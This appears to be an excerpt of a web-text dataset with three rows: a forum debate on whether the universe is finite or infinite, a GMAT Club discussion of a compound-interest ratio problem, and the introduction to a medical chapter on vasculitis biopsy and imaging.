url
stringlengths 14
2.42k
| text
stringlengths 100
1.02M
| date
stringlengths 19
19
| metadata
stringlengths 1.06k
1.1k
|
|---|---|---|---|
http://www.sciforums.com/threads/big-bang-theory-is-bang-wrong.4544/page-4
|
# Big Bang Theory Is Bang Wrong
Discussion in 'Astronomy, Exobiology, & Cosmology' started by amraam, Nov 12, 2001.
1. ### CanuteRegistered Senior Member
Messages:
1,923
I do not disagree by your definition of the terms.
3. ### BeerculesRegistered Senior Member
Messages:
342
A singularity has zero volume, and an infinite universe has infinite volume.
Keep in mind that the universe may also be finite.
5. ### The PhilosopherRegistered Member
Messages:
12
The Universe has been shown to have an accelerating expansion thus defying the critical density and making it infinite.
The difference between calling the Universe a singularity or infinite is that a singularity is a single point, the Universe, from our dimensional viewpoint is a large spread/expanse.
But who is to say that a singularity does not, in some higher dimension, say the 11th dimension, have greater volume than the Universe? That is where this all gets complicated, under string, superstring and M-theory.
M.
7. ### James RJust this guy, you know?Staff Member
Messages:
30,835
Philosopher:
<i>The Universe has been shown to have an accelerating expansion thus defying the critical density and making it infinite.</i>
An accelerating universe does not have to be infinite. In fact, most astronomers think our universe is finite. The density of matter is thought to be greater than the critical density, but there's also "dark energy".
8. ### CanuteRegistered Senior Member
Messages:
1,923
Yes but there is another way of looking at it. If the universe is infinite then it is all that there is with 'nothing' outside of it, if it is a singularity then likewise it is all there is with 'nothing' outside of it. From inside the universe the two conditions are indistinguishable.
The universe may be finite but in that case it exists in the cosmos, which is not. I think this is just a choice of definition.
9. ### BeerculesRegistered Senior Member
Messages:
342
They are quite distinguishable, because you're not likely to find anyone alive in a point of infinite temperature. Mathematically, there is a difference between zero and infinite volume, though we can't imagine either.
I don't know what you mean by cosmos. Are you implying there is some kind of multiverse outside our expanding universe, or do you just mean space-time as a whole?
10. ### The PhilosopherRegistered Member
Messages:
12
Hmmm..."dark energy" is very much a flawed concept in astronomical terms, it relies very much on highly theoretical hypotheses, whereas astronomy is observational mainly. Because the Universe has an accelerating expansion it will never experience a Big Crunch to "close" the Universe, but it will remain in an "open" state and just expand forever, thus making it infinite. The major point missing here is a defintion of infinite. At the moment, the Universe is, in fact, infinite because we cannot define its edges because as soon as you do define those edges then they will have moved outwards. It is just like a road map, each time a new road map is commissioned, it becomes instantly out of date due to new building of roads etc. Also, defining the Universe also becomes subject to the Heisenberg Uncertainty Principle.
M.
11. ### CanuteRegistered Senior Member
Messages:
1,923
If the universe is all there is then it seems unreasonable to say that once it had zero volume and now it is infinite. Where did all that volume come from? Surely the universe is no more or less than it ever was (a closed system in other words). High temperatures damage human beings but lets not be anthropomorphic. Can you clarify what we should both be meaning when we say 'singularity'. Is it a non-point or a very small one? I ask because this may be what we disagree about.
I was trying to avoid a misunderstanding caused by our definition of universe. Some people mean this universe, one among many in a multiverse, and some people mean everything that there is.
12. ### BeerculesRegistered Senior Member
Messages:
342
Well you're running into the absurdity of a singularity. In the case of an infinite universe, the overall size is constant. Space is infinite now, and always will be. A t=0 this universe vanishes, but that is only because there is no quantum theory of gravity. The infinites of GR should be replaced by something finite, which should mean the infinite universe remains infinite even at the very beginning.
We're talking about infinite temperature here - where even atoms cannot form. But again, this is one of the absurdities of a singular universe. You have infinite temperature in a point of zero volume.
Ok, but "all that there is" could still be finite.
13. ### CanuteRegistered Senior Member
Messages:
1,923
Agree with the rest of your post but not this. Is there a fence around it or what?
14. ### BeerculesRegistered Senior Member
Messages:
342
There is nothing logically inconsistant about a finite universe. The concept of infinite space is just more of what we're used to thinking of.
15. ### CanuteRegistered Senior Member
Messages:
1,923
Are you sure? It seems to me that there is.
Messages:
342
Like what?
17. ### CanuteRegistered Senior Member
Messages:
1,923
Well it might be my lack of imagination but I cannot conceive of there being an end to the cosmos. Why would it end? What would be 'outside' of it. What law of nature would detirmine that their were limits to its existence? How would we know if we reached the edge? How could it be both eternal and finite?
Also I have a problem with the idea that infinities can exist within a finite cosmos.
18. ### BeerculesRegistered Senior Member
Messages:
342
I also find it hard to imagine anything like that, but that isn't a logical inconsistancy. It is only a flaw of our limited human intuition.
If the universe is finite, there is no outside. It can be a hypersphere or have a hyperbolic shape, which means there would be no edge or center. I'm sure you've heard of the balloon analogy, and that applies here. The curved 2D surface represents the universe, with no inside or outside space. A 2D person could go in a straight line and if he went far enough, he would wind up right back where he started. The problem is that this is only a 2D analogy, and we cannot possibly imagine what a curved 3D surface looks like. But we can mathematically define it, and this the picture cosmology paints for our universe.
But it does seem hard to believe that space could be finite. When we consider that infinity is the only alternative, it seems somewhat easier to believe.
19. ### CanuteRegistered Senior Member
Messages:
1,923
I agree generally with what you said but still wonder what it means, what it tells us, that we cannot conceive of a cosmos that is finite without invoking all sorts of intellectual complications. Also Mr. Occam's razor suggests that the pragmatic and sensible hypothesis is that it is infinite.
I disgree with the bit of your post I have quoted. By some quirk of my neurons I find it easier to believe in infinity.
20. ### James RJust this guy, you know?Staff Member
Messages:
30,835
The Philosopher:
<i>Hmmm..."dark energy" is very much a flawed concept in astronomical terms, it relies very much on highly theoretical hypotheses, whereas astronomy is observational mainly.</i>
Astronomy is observation. Astrophysics is very much theoretical.
What is flawed about dark energy, in particular?
<i>Because the Universe has an accelerating expansion it will never experience a Big Crunch to "close" the Universe, but it will remain in an "open" state and just expand forever, thus making it infinite.</i>
The terms "closed" and "open" have very specific meanings in cosmology. As I said before, most astronomers currently believe the universe is closed, despite the fact that the expansion seems to be accelerating. Whether the universe is closed or open depends only on the total mass density.
21. ### BeerculesRegistered Senior Member
Messages:
342
Well, when you accept that curved space is gravity, the notion of closed finite universes does not seem that complicated.
But I agree that an infinite universe is easier to grasp at first thought. That is, until you start to look at the concept in more detail. Infinite space. Infinite galaxies. Infinite earths. Infinite people identical to yourself. No wonder such a concept has driven people mad. It's too bad there are only 2 options - as both an infinite and finite space seem difficult to swallow.
22. ### blobranaRegistered Senior Member
Messages:
2,214
Infinite space yes, (although bounded , as in foamy-space).
Infinite Galaxy's and planets etc , no.
there was only so much matter made during the big-bang.
I you look at the baryon density and photonic density there is a ratio of 1 billion to one.
This gives a upper mass limit to the production of baryonic matter in the universe. ( lets say 10 ^80) So there can only be a limited number (although astronomical).
The recent findings of the MAP probe have shown that there is not enough mass in the universe to close it, therefore it is open.
There are other lines of research that show that the number of omega(i wont explain) is within 10^60 decimal places of being flat!
For all intents and reasons i would imagine that the universe IS flat (with not one electron more or less) so that the universe will expand forever....
23. ### BeerculesRegistered Senior Member
Messages:
342
An infinite universe has an infinite amount of energy, hence an infinite number of galaxies.
|
2018-02-23 20:42:38
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5700027942657471, "perplexity": 825.2843234864333}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891814833.62/warc/CC-MAIN-20180223194145-20180223214145-00434.warc.gz"}
|
http://gmatclub.com/forum/a-bank-offers-an-interest-of-5-per-annum-compounded-annua-154203.html?fl=similar
|
Find all School-related info fast with the new School-Specific MBA Forum
It is currently 28 Oct 2016, 13:20
### GMAT Club Daily Prep
#### Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email.
Customized
for You
we will pick new questions that match your level based on your Timer History
Track
every week, we’ll send you an estimated GMAT score based on your performance
Practice
Pays
we will pick new questions that match your level based on your Timer History
# Events & Promotions
###### Events & Promotions in June
Open Detailed Calendar
# A bank offers an interest of 5% per annum compounded annua
Author Message
TAGS:
### Hide Tags
Manager
Joined: 09 Feb 2013
Posts: 120
Followers: 1
Kudos [?]: 764 [4] , given: 17
A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
11 Jun 2013, 03:58
4
KUDOS
7
This post was
BOOKMARKED
00:00
Difficulty:
35% (medium)
Question Stats:
74% (02:36) correct 26% (02:10) wrong based on 316 sessions
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year? A. 1:5 B. 625:3125 C. 100:105 D. 100^4:105^4 E. 725:3225 [Reveal] Spoiler: OA _________________ Kudos will encourage many others, like me. Good Questions also deserve few KUDOS. Last edited by Bunuel on 28 Jan 2015, 07:43, edited 2 times in total. Edited the question. Math Expert Joined: 02 Sep 2009 Posts: 35337 Followers: 6651 Kudos [?]: 85954 [12] , given: 10265 Re: A bank offers an interest of 5% per annum compounded annua [#permalink] ### Show Tags 11 Jun 2013, 05:59 12 This post received KUDOS Expert's post 10 This post was BOOKMARKED emmak wrote: A bank offers an interest of 5% per annum compounded annually on all its deposits. If$10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 1004:1054
E. 725:3225
The interest earned in the 1st year = $500 The interest earned in the 2nd year =$500*1.05
The interest earned in the 3rd year = $500*1.05^2 The interest earned in the 4th year =$500*1.05^3
The interest earned in the 5th year = $500*1.05^4 (500*1.05^3)/(500*1.05^4) = 1/1.05=100/105. Answer: C. _________________ Manager Status: Working hard to score better on GMAT Joined: 02 Oct 2012 Posts: 90 Location: Nepal Concentration: Finance, Entrepreneurship GPA: 3.83 WE: Accounting (Consulting) Followers: 0 Kudos [?]: 141 [0], given: 23 Re: A bank offers an interest of 5% per annum compounded annua [#permalink] ### Show Tags 14 Jun 2013, 03:22 emmak wrote: A bank offers an interest of 5% per annum compounded annually on all its deposits. If$10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 1004:1054
E. 725:3225
Hi Bunuel,
Here is my approach: is this correct?
Interest earned in 4 year= 10000(1+0.05)^4
Interest earned in 5 year= 10000(1+0.05)^5
Ratio= {10000(1.05)^4}/{10000(1.05^5)} =>1.05^4/1.05^5 =>1/1.05 Multiplied by 100 in both numerator and denominator gives 100:105
Hence Ans:C
_________________
Do not forget to hit the Kudos button on your left if you find my post helpful.
Math Expert
Joined: 02 Sep 2009
Posts: 35337
Followers: 6651
Kudos [?]: 85954 [0], given: 10265
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
14 Jun 2013, 03:28
atalpanditgmat wrote:
emmak wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year? A. 1:5 B. 625:3125 C. 100:105 D. 1004:1054 E. 725:3225 Hi Bunuel, Here is my approach: is this correct? Interest earned in 4 year= 10000(1+0.05)^4 Interest earned in 5 year= 10000(1+0.05)^5 Ratio= {10000(1.05)^4}/{10000(1.05^5)} =>1.05^4/1.05^5 =>1/1.05 Multiplied by 100 in both numerator and denominator gives 100:105 Hence Ans:C Check here: a-bank-offers-an-interest-of-5-per-annum-compounded-annua-154203.html#p1234708 _________________ Manager Joined: 29 Sep 2013 Posts: 53 Followers: 0 Kudos [?]: 30 [3] , given: 48 Re: A bank offers an interest of 5% per annum compounded annua [#permalink] ### Show Tags 26 Oct 2013, 02:14 3 This post received KUDOS 1 This post was BOOKMARKED emmak wrote: A bank offers an interest of 5% per annum compounded annually on all its deposits. If$10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 1004:1054
E. 725:3225
Thirty seconds approach, regardless of what the figure is at the 4th year it will at act as a base figure (100) for the next years 5% increase (to 105). So the ratio is 100:105 or option C
Manager
Status: Do till 740 :)
Joined: 13 Jun 2011
Posts: 113
Concentration: Strategy, General Management
GMAT 1: 460 Q35 V20
GPA: 3.6
WE: Consulting (Computer Software)
Followers: 1
Kudos [?]: 8 [0], given: 19
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
15 Apr 2014, 20:39
Buneul,
I have a doubt.
Quote:
The interest earned in the 1st year = $50 The interest earned in the 2nd year =$50*1.05
The interest earned in the 3rd year = $50*1.05^2 The interest earned in the 4th year =$50*1.05^3
The interest earned in the 5th year = $50*1.05^4 So we are just calculating the interest from interest.Are we not supposed to calculate the interest from the principle amount every year? SVP Status: The Best Or Nothing Joined: 27 Dec 2012 Posts: 1858 Location: India Concentration: General Management, Technology WE: Information Technology (Computer Software) Followers: 40 Kudos [?]: 1756 [0], given: 193 Re: A bank offers an interest of 5% per annum compounded annua [#permalink] ### Show Tags 15 Apr 2014, 22:00 atalpanditgmat wrote: emmak wrote: A bank offers an interest of 5% per annum compounded annually on all its deposits. If$10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 1004:1054
E. 725:3225
Hi Bunuel,
Here is my approach: is this correct?
Interest earned in 4 year= 10000(1+0.05)^4
Interest earned in 5 year= 10000(1+0.05)^5
Ratio= {10000(1.05)^4}/{10000(1.05^5)} =>1.05^4/1.05^5 =>1/1.05 Multiplied by 100 in both numerator and denominator gives 100:105
Hence Ans:C
This formula is to calculate the total amount, not the compound interest
You require to subtract the Principal to get the resultant compound interest
We require to calculate ratio of interest earned in 4th & 5th year
This method you're using is calculating ratio of 4 yr deposit to 5 yr deposit
_________________
Kindly press "+1 Kudos" to appreciate
SVP
Status: The Best Or Nothing
Joined: 27 Dec 2012
Posts: 1858
Location: India
Concentration: General Management, Technology
WE: Information Technology (Computer Software)
Followers: 40
Kudos [?]: 1756 [0], given: 193
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
15 Apr 2014, 22:06
Bunuel wrote:
emmak wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year? A. 1:5 B. 625:3125 C. 100:105 D. 1004:1054 E. 725:3225 The interest earned in the 1st year =$50
The interest earned in the 2nd year = $50*1.05 The interest earned in the 3rd year =$50*1.05^2
The interest earned in the 4th year = $50*1.05^3 The interest earned in the 5th year =$50*1.05^4
(50*1.05^3)/(50*1.05^4) = 1/1.05=100/105.
Bunuel, can you please correct this?
It should be 500
$$\frac{10000 * 5 * 1}{100} = 500$$
_________________
Kindly press "+1 Kudos" to appreciate
Intern
Joined: 20 May 2014
Posts: 39
Followers: 0
Kudos [?]: 3 [0], given: 1
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
23 Jul 2014, 09:42
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year? a) 1:5 b) 625 : 3125 c) 100 : 105 d) 100^4 : 100^5 e) 725 : 3225 First year: 10,000+5 NOTE: Using fractions is typically the easiest way to calculate, so we’ll represent 5% as 1/20 from here on out. Second year: 10,000∗21/20+1/20∗(10,000∗21/20)=21/20(10,000∗21/20)=(21/20)2∗10,000 Third year: (21/20)2(10,000)+1/20∗(21/20)2(10,000)=21/20∗(21/20)2(10,000)=(21/20)3∗10,000) If you follow the pattern, the total value at the end of each year will simply be (21/20)n(10,000) at the end of the nth year. The amount of interest each year is 1/20 of the previous year’s balance (that …+1/20 * the previous year). So, the amount of interest calculated in the 4th year will be: 1/20∗(21/20)3(10,000) And the amount of interest earned in the 5th year will be: 1/20∗(21/20)4(10,000) Putting those into ratio, you’ll see that the 1/20 and the 10,000 is common to both, so those terms divide out, leaving simply: (21/20)3/(21/20)4 Factoring out the common (21/20)3 term, we’re left with 1/(21/20). Dividing by a fraction is the same as multiplying by the reciprocal, so that can be expressed as 20/21, which is the same as 100/105. MY CONFUSION : IT WAS A LONG WORDY EXPLANATION, AND I GOT LOST IN IT, SO I NEED A MORE CONCISE EXPLANATION IF POSSIBLE, ALSO WHERE DOES THE 21/ 20 COME FROM? IN SECOND YEAR HOW COME WE ARE ADDING 21/20 AND 1/20 AND THEN MULTIPLYING BY 10,000 AND 1/20 WHY NOT MULTIPLY BY 21/20? Math Expert Joined: 02 Sep 2009 Posts: 35337 Followers: 6651 Kudos [?]: 85954 [0], given: 10265 Re: A bank offers an interest of 5% per annum compounded annua [#permalink] ### Show Tags 23 Jul 2014, 09:47 sagnik2422 wrote: A bank offers an interest of 5% per annum compounded annually on all its deposits. If$10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
a) 1:5
b) 625 : 3125
c) 100 : 105
d) 100^4 : 100^5
e) 725 : 3225
First year: 10,000+5
NOTE: Using fractions is typically the easiest way to calculate, so we’ll represent 5% as 1/20 from here on out.
Second year: 10,000∗21/20+1/20∗(10,000∗21/20)=21/20(10,000∗21/20)=(21/20)2∗10,000
Third year: (21/20)2(10,000)+1/20∗(21/20)2(10,000)=21/20∗(21/20)2(10,000)=(21/20)3∗10,000)
If you follow the pattern, the total value at the end of each year will simply be (21/20)n(10,000) at the end of the nth year. The amount of interest each year is 1/20 of the previous year’s balance (that …+1/20 * the previous year). So, the amount of interest calculated in the 4th year will be:
1/20∗(21/20)3(10,000)
And the amount of interest earned in the 5th year will be:
1/20∗(21/20)4(10,000)
Putting those into ratio, you’ll see that the 1/20 and the 10,000 is common to both, so those terms divide out, leaving simply:
(21/20)3/(21/20)4
Factoring out the common (21/20)3 term, we’re left with 1/(21/20). Dividing by a fraction is the same as multiplying by the reciprocal, so that can be expressed as 20/21, which is the same as 100/105.
MY CONFUSION : IT WAS A LONG WORDY EXPLANATION, AND I GOT LOST IN IT, SO I NEED A MORE CONCISE EXPLANATION IF POSSIBLE, ALSO WHERE DOES THE 21/ 20 COME FROM? IN SECOND YEAR HOW COME WE ARE ADDING 21/20 AND 1/20 AND THEN MULTIPLYING BY 10,000 AND 1/20 WHY NOT MULTIPLY BY 21/20?
Merging topics. Please refer to the discussion above.
_________________
Intern
Joined: 17 Aug 2014
Posts: 5
Followers: 0
Kudos [?]: 0 [0], given: 13
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
03 Sep 2014, 12:11
Hi Bunel, I like your explanation but have 2 questions.
You say (500*1.05^3)/(500*1.05^4) = 1/1.05. I understand the 1, but when you divide exponents, I thought you subtract (i.e. 1.05^3/1.05^4 = 1.05^-1).
Also, what would the equation look like if they wanted the ratio of the total amounts (principal + interest) for years 4 and 5?
Director
Joined: 23 Jan 2013
Posts: 547
Schools: Cambridge'16
Followers: 1
Kudos [?]: 39 [0], given: 40
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
03 Sep 2014, 21:59
10000*1.05^4/10000*1.05^5
we get 10000/10000*1.05=10000/10500=100/105
Verbal Forum Moderator
Joined: 16 Jun 2012
Posts: 1153
Location: United States
Followers: 248
Kudos [?]: 2701 [0], given: 123
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
03 Sep 2014, 23:12
Temurkhon wrote:
10000*1.05^4/10000*1.05^5
we get 10000/10000*1.05=10000/10500=100/105
Hello.
You're correct for choosing C but wrong for interest formula buddy.
The question asks you to calculate ration of the interest earned in 4th year to the interest earned in 5th year. Your formula is to calculate Total value in 4th year and 5th year NOT interests.
In order to calculate INTEREST in 4th and 5th year, you have to calculate INTEREST in 1st year.
interest in 1st year = 10,000*0.05 = 500
interest in 2nd year = 500*1.05
interest in 3rd year = 500*1.05^2
interest in 4th year = 500*1.05^3
interest in 5th year = 500*1.05^4
Ratio = 1/1.05 = 100/105
Hope it helps.
_________________
Please +1 KUDO if my post helps. Thank you.
"Designing cars consumes you; it has a hold on your spirit which is incredibly powerful. It's not something you can do part time, you have do it with all your heart and soul or you're going to get it wrong."
Chris Bangle - Former BMW Chief of Design.
Intern
Joined: 16 Mar 2014
Posts: 4
Followers: 0
Kudos [?]: 0 [0], given: 0
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
07 Jul 2015, 11:40
Could somebody please explain, how interest could be calculated this way -
The interest earned in the 1st year = $500 The interest earned in the 2nd year =$500*1.05
The interest earned in the 3rd year = $500*1.05^2 The interest earned in the 4th year =$500*1.05^3
The interest earned in the 5th year = $500*1.05^4 Since we are compounding, the interest for the second year should be 500 + 500*1.05 VP Joined: 08 Jul 2010 Posts: 1344 Location: India GMAT: INSIGHT WE: Education (Education) Followers: 57 Kudos [?]: 1262 [0], given: 42 Re: A bank offers an interest of 5% per annum compounded annua [#permalink] ### Show Tags 07 Jul 2015, 14:20 emmak wrote: A bank offers an interest of 5% per annum compounded annually on all its deposits. If$10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 100^4:105^4
E. 725:3225
Interest earned in the first year = $10,000 *(5/100) =$500
i.e. The interest earned in the 1st year = $500 The interest earned in the Second year =$10,000 *(5/100) + $500 *(5/100) =$500 + (5/100)*$500 =$500*1.05
i.e. The interest earned in the 2nd year = $500*1.05 Similarly, The interest earned in the 3rd year =$500*1.05^2
The interest earned in the 4th year = $500*1.05^3 The interest earned in the 5th year =$500*1.05^4
(500*1.05^3)/(500*1.05^4) = 1/1.05=100/105.
NOTE: Writing every step here is not a great idea as we must understand that Coumpound interest is a form of Geometric Progression in which the ratio of two consecutive terms remain constant hence
1st year interest / 2nd year interest = 2nd year interest / 3rd year interest = 3rd year interest / 4th year interest = 4th year interest / 5th year interest = 1/1.05
_________________
Prosper!!!
GMATinsight
Bhoopendra Singh and Dr.Sushma Jha
e-mail: info@GMATinsight.com
Call us : +91-9999687183 / 9891333772
http://www.GMATinsight.com/testimonials.html
Feel free to give a Kudos if it is a useful post .
Intern
Joined: 16 Aug 2013
Posts: 18
Followers: 0
Kudos [?]: 1 [0], given: 60
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
17 Sep 2015, 21:26
shankar245 wrote:
Buneul,
I have a doubt.
Quote:
The interest earned in the 1st year = $50 The interest earned in the 2nd year =$50*1.05
The interest earned in the 3rd year = $50*1.05^2 The interest earned in the 4th year =$50*1.05^3
The interest earned in the 5th year = $50*1.05^4 So we are just calculating the interest from interest.Are we not supposed to calculate the interest from the principle amount every year? Hi Bunuel I'm agree with shankar245 the interest earned in the 4th years is= 10000(1+0.05)^4-10000=10000((1+0.05)^4-1) the interest earned in the 5th years is= 10000(1+0.05)^5-10000=10000((1+0.05)^5-1) the ratio is ((1+0.05)^4-1)/((1+0.05)^5-1)=0.78 can you please clarify? VP Joined: 08 Jul 2010 Posts: 1344 Location: India GMAT: INSIGHT WE: Education (Education) Followers: 57 Kudos [?]: 1262 [0], given: 42 A bank offers an interest of 5% per annum compounded annua [#permalink] ### Show Tags 17 Sep 2015, 23:47 amirzohrevand wrote: shankar245 wrote: Buneul, I have a doubt. Quote: The interest earned in the 1st year =$50
The interest earned in the 2nd year = $50*1.05 The interest earned in the 3rd year =$50*1.05^2
The interest earned in the 4th year = $50*1.05^3 The interest earned in the 5th year =$50*1.05^4
So we are just calculating the interest from interest.Are we not supposed to calculate the interest from the principle amount every year?
Hi Bunuel
I'm agree with shankar245
the interest earned in the 4th years is= 10000(1+0.05)^4-10000=10000((1+0.05)^4-1)
the interest earned in the 5th years is= 10000(1+0.05)^5-10000=10000((1+0.05)^5-1)
the ratio is ((1+0.05)^4-1)/((1+0.05)^5-1)=0.78
$500*1.05 = 500 + (5/100)*500 Where 500 is interest earned on principle And (5/100)*500 is interest earned on previous interest. So the expressions include both. I hope this helps! _________________ Prosper!!! GMATinsight Bhoopendra Singh and Dr.Sushma Jha e-mail: info@GMATinsight.com Call us : +91-9999687183 / 9891333772 http://www.GMATinsight.com/testimonials.html Feel free to give a Kudos if it is a useful post . Last edited by GMATinsight on 18 Sep 2015, 04:06, edited 1 time in total. Intern Joined: 16 Aug 2013 Posts: 18 Followers: 0 Kudos [?]: 1 [0], given: 60 A bank offers an interest of 5% per annum compounded annua [#permalink] ### Show Tags 18 Sep 2015, 01:06 Hi Bunuel I'm agree with shankar245 the interest earned in the 4th years is= 10000(1+0.05)^4-10000=10000((1+0.05)^4-1) the interest earned in the 5th years is= 10000(1+0.05)^5-10000=10000((1+0.05)^5-1) the ratio is ((1+0.05)^4-1)/((1+0.05)^5-1)=0.78 can you please clarify?[/quote]$50*1.05 = 50 + (5/100)*50
Where 50 is interest earned on principle
And
(5/100)*50 is interest earned on previous interest.
So the expressions include both.
I hope this helps![/quote]
Hi
Dear GMATinsight
I'm not agree with your approach cuz you dismissed the principle , however the principle must be seen.
your approach yields 0.92 but my approach yields 0.78
I'm still confused
could you elaborate more? plz
can you please let me know what is wrong with my approach?
tnx
VP
Joined: 08 Jul 2010
Posts: 1344
Location: India
GMAT: INSIGHT
WE: Education (Education)
Followers: 57
Kudos [?]: 1262 [0], given: 42
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
### Show Tags
18 Sep 2015, 04:04
amirzohrevand wrote:
Hi
Dear GMATinsight
I'm not agree with your approach cuz you dismissed the principle , however the principle must be seen.
your approach yields 0.92 but my approach yields 0.78
I'm still confused
could you elaborate more? plz
can you please let me know what is wrong with my approach?
tnx
Principle = $10,000 Rate of Interest = 5% Interest earned in the first year =$10,000 *(5/100) = $500 i.e. The interest earned in the 1st year =$500
The interest earned in the Second year = $10,000 *(5/100) +$500 *(5/100) = $500 + (5/100)*$500 = $500*1.05 i.e. The interest earned in the 2nd year =$500*1.05
Similarly,
The interest earned in the 3rd year = $500*1.05^2 The interest earned in the 4th year =$500*1.05^3
The interest earned in the 5th year = $500*1.05^4 (500*1.05^3)/(500*1.05^4) = 1/1.05=100/105. _________________ Prosper!!! GMATinsight Bhoopendra Singh and Dr.Sushma Jha e-mail: info@GMATinsight.com Call us : +91-9999687183 / 9891333772 http://www.GMATinsight.com/testimonials.html Feel free to give a Kudos if it is a useful post . Current Student Joined: 04 May 2015 Posts: 75 Concentration: Strategy, Operations WE: Operations (Military & Defense) Followers: 1 Kudos [?]: 15 [0], given: 58 Re: A bank offers an interest of 5% per annum compounded annua [#permalink] ### Show Tags 28 Sep 2015, 08:42 suk1234 wrote: emmak wrote: A bank offers an interest of 5% per annum compounded annually on all its deposits. If$10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 1004:1054
E. 725:3225
Thirty seconds approach, regardless of what the figure is at the 4th year it will at act as a base figure (100) for the next years 5% increase (to 105). So the ratio is 100:105 or option C
I am literally ashamed that I didn't see this
_________________
If you found my post useful, please consider throwing me a Kudos... Every bit helps
Re: A bank offers an interest of 5% per annum compounded annua [#permalink] 28 Sep 2015, 08:42
Go to page 1 2 Next [ 21 posts ]
Similar topics Replies Last post
Similar
Topics:
If John invested \$ 1 at 5 percent interest compounded annually, the to 2 27 Dec 2015, 09:42
2 A new savings account offers 6 percent annual interest compounded ever 7 24 Jul 2015, 00:43
6 A certain account pays 1.5 percent compound interest every 7 29 Jul 2013, 09:09
5 If money is invested at r percent interest, compounded annua 10 27 Jan 2013, 23:46
26 If money is invested at r percent interest, compounded annua 9 17 Dec 2012, 06:46
Display posts from previous: Sort by
|
2016-10-28 20:20:18
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4335744380950928, "perplexity": 3678.363675421448}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988725470.56/warc/CC-MAIN-20161020183845-00183-ip-10-171-6-4.ec2.internal.warc.gz"}
|
http://accessmedicine.mhmedical.com/content.aspx?bookid=331§ionid=40727128
|
Chapter e40
Diagnosis of the vasculitic syndromes is usually based upon characteristic histologic or arteriographic findings in a patient who has clinically compatible features. The images provided in this atlas highlight some of the characteristic histologic and radiographic findings that may be seen in the vasculitic diseases. These images demonstrate the importance that tissue histology may have in securing the diagnosis of vasculitis, the utility of diagnostic imaging in the vasculitic diseases, and the improvements in the care of vasculitis patients that have resulted from radiologic innovations.
Tissue biopsies represent vital information in many patients with a suspected vasculitic syndrome, not only in confirming the presence of vasculitis and other characteristic histologic features, but also in ruling out other diseases that can have similar clinical presentations. The determination of where biopsies should be performed is based upon the presence of clinical disease in an affected organ, the likelihood of a positive diagnostic yield from data contained in the published literature, and the risk of performing a biopsy in an affected site. Common sites where biopsies may be performed include the lung, kidney, and skin. Other sites such as sural nerve, brain, testicle, and gastrointestinal tissues may also demonstrate features of vasculitis and be appropriate locations for biopsy when clinically affected.
